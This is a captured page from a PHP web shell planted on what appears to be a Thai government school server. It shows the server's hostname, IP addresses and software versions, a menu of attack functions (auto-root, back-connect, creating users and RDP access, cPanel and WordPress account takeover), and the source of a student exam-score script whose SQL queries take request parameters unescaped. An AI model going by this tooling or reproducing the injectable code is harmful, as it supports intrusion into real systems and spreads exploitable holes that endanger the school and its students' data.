Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
bets /
expand /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
index.php
1.01
KB
-rw-r--r--
level_report_1.php
40.3
KB
-rw-r--r--
level_report_2.php
33.4
KB
-rw-r--r--
level_report_3.php
22.45
KB
-rw-r--r--
level_report_4.php
14.48
KB
-rw-r--r--
sch_paper_report_1.php
63.51
KB
-rw-r--r--
sch_report_1.php
66.17
KB
-rw-r--r--
student_paper_report_1.php
17.79
KB
-rw-r--r--
student_report_1.php
25.36
KB
-rw-r--r--
test_admin3.php
12.46
KB
-rw-r--r--
test_admin_book2.php
20.8
KB
-rw-r--r--
test_sch.php
6.34
KB
-rw-r--r--
test_sch_2.php
30.45
KB
-rw-r--r--
test_student.php
36.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_admin_book2.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); $officer=$remote_user_id; echo "<br />"; //ส่วนเพิ่มข้อมูล if($index==1){ $sql = "select * from bets_paper_test_1 where id='$_GET[test_id]'"; $dbquery = mysqli_query($connect,$sql); $result = mysqli_fetch_array($dbquery); echo "<form id='frm1' name='frm1'>"; echo "<Center>"; echo "<Font color='#006666' Size=3><B>บันทึกผลการสอบ</B></Font><br>"; echo "<Font color='#006666' Size=3><B>$result[test_name]</B></Font>"; echo "</Cener>"; echo "<Br>"; // ปีการศึกษา $sql_year = "select * from student_main_edyear where year_active='1' order by ed_year desc limit 1"; $dbquery_year = mysqli_query($connect,$sql_year); $result_year = mysqli_fetch_array($dbquery_year); echo "<Table width='60%' Border='1' align='center' style='border-collapse: collapse'>"; echo "<Tr align='left'><Td align='center'><b>ข้อคำถาม</b> </Td><Td align='center' width='250'>"; echo "นักเรียน <Select name='student' size='1'>"; echo "<option value = ''>เลือก</option>" ; $sql_student = "select * from student_main_main where school_code='$remote_user_office' and classlevel='$result[class_room]' and ed_year='$result_year[ed_year]' order by name"; $dbquery_student = mysqli_query($connect,$sql_student); while($result_student = mysqli_fetch_array($dbquery_student)){ echo "<option value ='$result_student[person_id]'>$result_student[name] $result_student[surname]</option>" ; } echo "</select>"; echo "<br><br>"; echo "</Td></Tr>"; $sql2 = "select * from bets_book_item where test_id='$_GET[test_id]' order by item_number"; $dbquery2 = mysqli_query($connect,$sql2); while($result2 = mysqli_fetch_array($dbquery2)){ $item_id=$result2['id']; $item_number=$result2['item_number']; $item_type=$result2['item_type']; $answer_num=$result2['answer_num']; $question=$result2['question']; $score=$result2['score']; if($item_type==0){ echo "<Tr align='left'><Td align='left''>ข้อที่ $item_number $question</Td><Td align='left'> (1)<Input Type='radio' Name='item[$item_id]' value='1'> (2)<Input Type='radio' Name='item[$item_id]' value='2'> (3)<Input Type='radio' Name='item[$item_id]' value='3'> "; if($answer_num>=4){ echo "(4)<Input Type='radio' Name='item[$item_id]' value='4'> "; } if($answer_num==5){ echo "(5)<Input Type='radio' Name='item[$item_id]' value='5'>"; } echo "</Td></Tr>"; } else if($item_type==1){ echo "<Tr align='left'><Td align='left''>ข้อที่ $item_number $question</Td><Td align='left'> <Input Type='text' Name='item[$item_id]' id='$item_id' size='5' style='background-color: #99ccff' onchange='check($item_id,$score)'> คะแนน ($score)</Td></Tr>"; } } echo "<Br>"; echo "</Table>"; echo "<Br>"; echo "<Input Type=Hidden Name='school' Value='$remote_user_office'>"; echo "<Input Type=Hidden Name='test_id' Value='$_GET[test_id]'>"; echo "<Input Type=Hidden Name='return_page' Value='$_GET[return_page]'>"; echo "<INPUT TYPE='button' name='smb' value='ตกลง' onclick='goto_url(1)'> <INPUT TYPE='button' name='back' value='ย้อนกลับ' onclick='goto_url(0)'>"; echo "<input type='hidden' name='remote_user_office' value='$remote_user_office'>"; echo "<input type='hidden' name='remote_user_id' value='$remote_user_id'>"; echo "<input type='hidden' name='remote_login_status' value='$remote_login_status'>"; echo "<input type='hidden' name='remote_sync' value='$remote_sync'>"; echo "</form>"; } //ส่วนเพิ่มข้อมูลรายการสอบ if($index==4){ $rec_date = date("Y-m-d H:i:s"); $sql = "select * from bets_paper_test_1 where id='$_POST[test_id]'"; $dbquery = mysqli_query($connect,$sql); $result = mysqli_fetch_array($dbquery); $test_id=$_POST['test_id']; $school=$_POST['school']; $person_id=$_POST['student']; $class_room=$result['class_room']; $class_room=$class_room-3; $sql_check= "select * from bets_paper_answer where test_id='$_POST[test_id]' and person_id='$person_id'"; $dbquery_check = mysqli_query($connect,$sql_check); $num_rows=mysqli_num_rows($dbquery_check); if($num_rows>0){ $sql = "delete from bets_paper_answer where test_id='$_POST[test_id]' and person_id='$person_id'"; $dbquery = mysqli_query($connect,$sql); } $sql2 = "select * from bets_book_item where test_id='$_POST[test_id]' order by id"; $dbquery2 = mysqli_query($connect,$sql2); while($result2 = mysqli_fetch_array($dbquery2)){ $item_id=$result2['id']; $item_type=$result2['item_type']; $indicator_code=$result2['indicator_code']; $right_answer=$result2['right_answer']; $full_score=$result2['score']; if(isset($_POST['item'][$item_id])){ if($item_type==0){ $answer=$_POST['item'][$item_id]; if($_POST['item'][$item_id]==$right_answer){ $score=$full_score; } else{ $score=0; } } else if($item_type==1){ $answer=""; $score=$_POST['item'][$item_id]; if($score>$full_score){ echo "<script>alert('ค่าคะแนนเกิน ตรวจสอบอีกครั้ง'); document.location.href='?file=test_admin_book2&index=1&test_id=$_POST[test_id]&return_page=$_POST[return_page]&remote_user_office=$remote_user_office&remote_user_id=$remote_user_id&remote_login_status=$remote_login_status&remote_sync=$remote_sync';</script>\n"; exit(); } } $sql_insert = "insert into bets_paper_answer (school,test_id,person_id,item_type,item_id,answer,score,item_score,officer,rec_date) values ( '$school','$test_id','$person_id','$item_type','$item_id','$answer','$score','$full_score','$officer','$rec_date')"; $dbquery_insert = mysqli_query($connect,$sql_insert); } else{ $sql_insert = "insert into bets_paper_answer (school,test_id,person_id,item_type,item_id,answer,score,item_score,officer,rec_date) values ( '$school','$test_id','$person_id','$item_type','$item_id','','0','$full_score','$officer','$rec_date')"; $dbquery_insert = mysqli_query($connect,$sql_insert); } } //หลังการบันทึก $sql_check= "select count(id) as item_num, sum(score) as score, sum(item_score) as item_score from bets_paper_answer where test_id='$_POST[test_id]' and person_id='$person_id'"; $dbquery_check = mysqli_query($connect,$sql_check); $result_check=mysqli_fetch_array($dbquery_check); $item_num=$result_check['item_num']; $score=$result_check['score']; $item_score=$result_check['item_score']; if($item_score>0){ $percent=$score/$item_score*100; } else{ $percent=0; } $percent=number_format($percent,2); //////////////////////////////////////////////////////// // เชื่อมdatabase ชื่อ amssplus_bets ///////// $user_db=$user; if(isset($amssplus_bets)){ $amssplus_bets=$amssplus_bets; } else{ $amssplus_bets="amssplus_bets"; } $connect_bets=@mysqli_connect($hostname,$user_db,$password,$amssplus_bets); if($connect_bets){ mysqli_query($connect_bets,"SET NAMES utf8"); } ///////// //end // ปีการศึกษา $sql_year = "select * from student_main_edyear where year_active='1' order by ed_year desc limit 1"; $dbquery_year = mysqli_query($connect,$sql_year); $result_year = mysqli_fetch_array($dbquery_year); $ed_year=$result_year['ed_year']; //บันทึก profile คะแนนรวม // หากลุ่มสาระ $sql = "select * from bets_paper_test_1 left join bets_group on bets_paper_test_1.s_group=bets_group.group_code where bets_paper_test_1.id='$_POST[test_id]' "; $dbquery = mysqli_query($connect,$sql); $result = mysqli_fetch_array($dbquery); $g1=$result['g1']; $g2=$result['g2']; //กำหนดtable ของ bets2 $table_main=""; $table_expand=""; if($connect_bets){ $curriculum=substr($result['s_group'],0,4); if($curriculum=='2551'){ if($result['s_group']=='255101'){ $table_main='thai'; } else if($result['s_group']=='255102'){ $table_main='math'; } else if($result['s_group']=='255103'){ $table_main='science'; } else if($result['s_group']=='255104'){ $table_main='social'; } else if($result['s_group']=='255108'){ $table_main='english'; } $table_expand=$table_main."_expand_".$result['level']; } else if($curriculum=='2560'){ if($result['s_group']=='256001'){ $table_main='math'; } else if($result['s_group']=='256002'){ $table_main='science'; } else if($result['s_group']=='256003'){ $table_main='social'; } $table_expand=$table_main."_expand_".$result['level']; } } // หาคะแนนเต็ม $sql_full_score = "select sum(item_score) as full_score from bets_paper_answer where test_id='$_POST[test_id]' and school='$school' and person_id='$person_id' "; $dbquery_full_score = mysqli_query($connect,$sql_full_score); $result_full_score = mysqli_fetch_array($dbquery_full_score); $full_score=$result_full_score['full_score']; //หาคะแนนที่ได้ $sql_right = "select sum(score) as score from bets_paper_answer where test_id='$_POST[test_id]' and school='$school' and person_id='$person_id' "; $dbquery_right = mysqli_query($connect,$sql_right ); $result_score = mysqli_fetch_array($dbquery_right); $total_right=$result_score['score']; $total_percent=""; if($full_score!=0){ $total_percent=($total_right/$full_score)*100; $total_percent=number_format($total_percent,2); //บันทึก Profile คะแนนรวม Level if($connect_bets){ $rec_date = date("Y-m-d"); if(@$result['profile_active']==1 and $result['level']!=0){ $sql_level = "select * from $table_main where person_id='$person_id' and level='$result[level]' "; $dbquery_level = mysqli_query($connect_bets,$sql_level); $result_level = mysqli_fetch_array($dbquery_level); if($result_level){ $time_no=$result_level['time_no']+1; $sql_update = "update $table_main set ed_year='$ed_year', school_code='$school', score='$total_percent',time_no='$time_no',rec_date='$rec_date' where person_id='$person_id' and level='$result[level]'"; $dbquery_update = mysqli_query($connect_bets,$sql_update); } else{ $sql_insert_1 = "insert into $table_main(ed_year,school_code,person_id,group_code,level,score,time_no,rec_date) values ('$ed_year','$school','$person_id','$result[group_code]','$result[level]','$total_percent','1','$rec_date')"; $dbquery_insert = mysqli_query($connect_bets,$sql_insert_1); } //ลบข้อมูลคะแนนรายตัวชี้วัด if($result_level['time_no']>0){ $sql_del = "delete from $table_expand where person_id='$person_id' and level='$result[level]'"; $dbquery_del = mysqli_query($connect_bets,$sql_del); } } } //End Profile คะแนนรวม } //end บันทึกprofile คะแนนรวม // profile รายตัวชี้วัด $sql_2 = "select * from bets_indicator,bets_standard,bets_substance where bets_indicator.standard_code=bets_standard.standard_code and bets_standard.substance_code=bets_substance.substance_code and bets_substance.group_code='$result[s_group]' and bets_indicator.class_code='$class_room' order by bets_indicator.id "; $dbquery_2 = mysqli_query($connect,$sql_2); while($result_2 = mysqli_fetch_array($dbquery_2)){ $indicator_percent=""; $sql_3 = "select sum(bets_paper_answer.item_score) as full_score from bets_paper_answer,bets_book_item,bets_indicator where bets_paper_answer.item_id=bets_book_item.id and bets_book_item.indicator_code=bets_indicator.indicator_code and bets_paper_answer.test_id='$_POST[test_id]' and bets_paper_answer.school='$school' and bets_indicator.indicator_code='$result_2[indicator_code]' and person_id='$person_id' "; $dbquery_3 = mysqli_query($connect,$sql_3); $result_3 = mysqli_fetch_array($dbquery_3); $sql_4 = "select sum(bets_paper_answer.score) as score from bets_paper_answer,bets_book_item,bets_indicator where bets_paper_answer.item_id=bets_book_item.id and bets_book_item.indicator_code=bets_indicator.indicator_code and bets_paper_answer.test_id='$_POST[test_id]' and bets_paper_answer.school='$school' and bets_indicator.indicator_code='$result_2[indicator_code]' and person_id='$person_id' "; $dbquery_4 = mysqli_query($connect,$sql_4); $result_4 = mysqli_fetch_array($dbquery_4); if($result_3['full_score']!=0){ $indicator_percent=($result_4['score']/$result_3['full_score'])*100; $indicator_percent=number_format($indicator_percent,2); } //บันทึกProfile คะแนนตัวชี้วัด if($connect_bets){ $rec_date = date("Y-m-d"); if(@$result['profile_active']==1 and $result['level']!=0 and $indicator_percent!=""){ $sql_insert_2 = "insert into $table_expand(person_id,indicator,level,score,rec_date) values ('$person_id','$result_2[indicator_code]','$result[level]','$indicator_percent','$rec_date')"; $dbquery_insert_2 = mysqli_query($connect_bets,$sql_insert_2); } } //End Profile } echo "<script>alert('$item_num ข้อ คะแนนที่ได้ $score คะแนน [$percent%]'); document.location.href='?file=test_admin_book2&index=1&test_id=$_POST[test_id]&return_page=$_POST[return_page]&remote_user_office=$remote_user_office&remote_user_id=$remote_user_id&remote_login_status=$remote_login_status&remote_sync=$remote_sync';</script>\n"; } //ส่วนการแสดงผล if(!(($index==1) or ($index==2) or ($index==2.2) or ($index==4) or ($index==5) or ($index==5.2) or ($index==6) or ($index==7))){ echo "<table width='50%' border='0' align='center'>"; echo "<tr align='center'><td><font color='#006666' size='3'><strong>บันทึกผลการสอบ</strong></font></td></tr>"; echo "</table>"; echo "<br>"; $sql_page ="select *,bets_paper_test_1.id, bets_paper_test_1.test_name,bets_paper_test_1.class_room,bets_paper_test_1.level,bets_paper_test_1.test_active,bets_paper_test_1.officer from bets_paper_test_1,bets_group where bets_paper_test_1.s_group=bets_group.group_code and bets_paper_test_1.test_active='1'"; $dbquery_page = mysqli_query($connect,$sql_page); $num_rows=mysqli_num_rows($dbquery_page); if(isset($_REQUEST['return_page'])){ $_REQUEST['page']=$_REQUEST['return_page']; } $pagelen=20; // กำหนดแถวต่อหน้า $url_link="file=test_admin_book2&remote_user_office=$remote_user_office&remote_user_id=$remote_user_id&remote_login_status=$remote_login_status&remote_sync=$remote_sync"; $totalpages=ceil($num_rows/$pagelen); if(!(isset($_REQUEST['page']))){ $_REQUEST['page']=""; } if($_REQUEST['page']==""){ $page=$totalpages; if($page<2){ $page=1; } } else{ if($totalpages<$_REQUEST['page']){ $page=$totalpages; if($page<1){ $page=1; } } else{ $page=$_REQUEST['page']; } } $start=($page-1)*$pagelen; if(($totalpages>1) and ($totalpages<16)){ echo "<div align=center>"; echo "หน้า "; for($i=1; $i<=$totalpages; $i++) { if($i==$page){ echo "[<b><font size=+1 color=#990000>$i</font></b>]"; } else { echo "<a href=$PHP_SELF?$url_link&page=$i>[$i]</a>"; } } echo "</div>"; } if($totalpages>15){ if($page <=8){ $e_page=15; $s_page=1; } if($page>8){ if($totalpages-$page>=7){ $e_page=$page+7; $s_page=$page-7; } else{ $e_page=$totalpages; $s_page=$totalpages-15; } } echo "<div align=center>"; if($page!=1){ $f_page1=$page-1; echo "<<a href=$PHP_SELF?$url_link&page=1>หน้าแรก </a>"; echo "<<<a href=$PHP_SELF?$url_link&page=$f_page1>หน้าก่อน </a>"; } else { echo "หน้า "; } for($i=$s_page; $i<=$e_page; $i++){ if($i==$page){ echo "[<b><font size=+1 color=#990000>$i</font></b>]"; } else { echo "<a href=$PHP_SELF?$url_link&page=$i>[$i]</a>"; } } if($page<$totalpages) { $f_page2=$page+1; echo "<a href=$PHP_SELF?$url_link&page=$f_page2> หน้าถัดไป</a>>>"; echo "<a href=$PHP_SELF?$url_link&page=$totalpages> หน้าสุดท้าย</a>>"; } //echo " <select onchange=\"location.href=this.options[this.selectedIndex].value;\" size=\"1\" name=\"select\">"; //echo "<option value=\"\">หน้า</option>"; // for($p=1;$p<=$totalpages;$p++){ // echo "<option value=\"?$url_link&page=$p\">$p</option>"; // } echo "</select>"; echo "</div>"; } //จบแยกหน้า echo "<form id='frm1' name='frm1'>"; $sql = "select * ,bets_paper_test_1.id, bets_paper_test_1.test_name,bets_paper_test_1.class_room,bets_paper_test_1.level,bets_paper_test_1.test_active,bets_paper_test_1.officer from bets_paper_test_1,bets_group where bets_paper_test_1.s_group=bets_group.group_code and bets_paper_test_1.test_active='1' order by bets_paper_test_1.class_room,bets_paper_test_1.level,bets_paper_test_1.s_group limit $start,$pagelen"; $dbquery = mysqli_query($connect,$sql); echo "<table width='65%' border='1' borderColor='#999999' align='center' style='border-collapse: collapse'>"; echo "<Tr bgcolor='#FFCCCC' align='center'><Td width='60'>ลำดับที่</Td><Td>ชื่อแบบทดสอบ</Td><Td width='200'>กลุ่มสาระ</Td><Td width='70'>ชั้น</Td><Td width='70'>ระดับ</Td><Td width='50'>บันทึก</Td></Tr>"; $N=(($page-1)*$pagelen)+1; //*เกี่ยวข้องกับการแยกหน้า $M=1; While ($result = mysqli_fetch_array($dbquery)) { $id = $result['id']; $test_name= $result['test_name']; if(($M%2) == 0) $color="#FFFFC"; else $color="#FFFFFF"; echo "<Tr bgcolor=$color align='center'><Td>$N</Td><Td align='left'>$test_name</Td><Td align='left'>$result[group_name]</Td>"; echo "<td>"; if($result['class_room']==1){ echo "อ1"; } else if($result['class_room']==2){ echo "อ.2"; } else if($result['class_room']==3){ echo "อ.3"; } else if($result['class_room']==4){ echo "ป.1"; } else if($result['class_room']==5){ echo "ป.2"; } else if($result['class_room']==6){ echo "ป.3"; } else if($result['class_room']==7){ echo "ป.4"; } else if($result['class_room']==8){ echo "ป.5"; } else if($result['class_room']==9){ echo "ป.6"; } else if($result['class_room']==10){ echo "ม.1"; } else if($result['class_room']==11){ echo "ม.2"; } else if($result['class_room']==12){ echo "ม.3"; } else if($result['class_room']==13){ echo "ม.4"; } else if($result['class_room']==14){ echo "ม.5"; } else if($result['class_room']==15){ echo "ม.6"; } echo "</td>"; echo "<Td align='center'>$result[level]</Td>"; echo "<Td><a href=?file=test_admin_book2&index=1&test_id=$id&return_page=$page&remote_user_office=$remote_user_office&remote_user_id=$remote_user_id&remote_login_status=$remote_login_status&remote_sync=$remote_sync><img src=../../../images/edit.png border='0'></a></div></Td>"; echo "</Tr>"; $M++; $N++; } echo "</Table>"; echo "<input type='hidden' name='remote_user_office' value='$remote_user_office'>"; echo "<input type='hidden' name='remote_user_id' value='$remote_user_id'>"; echo "<input type='hidden' name='remote_login_status' value='$remote_login_status'>"; echo "<input type='hidden' name='remote_sync' value='$remote_sync'>"; echo "</form>"; } ?> <script> function goto_url(val){ if(val==0){ callfrm("?file=test_admin_book2"); }else if(val==1){ if(frm1.student.value == ""){ alert("กรุณาเลือกนักเรียน"); }else{ callfrm("?file=test_admin_book2&index=4"); } } } function check(x, y){ var w = document.getElementById(x).value; if(w>y){ alert("กรอกค่าคะแนนเกินค่าคะแนนเต็ม"); document.getElementById(x).value=""; document.getElementById(x).focus(); } } </script>
Close
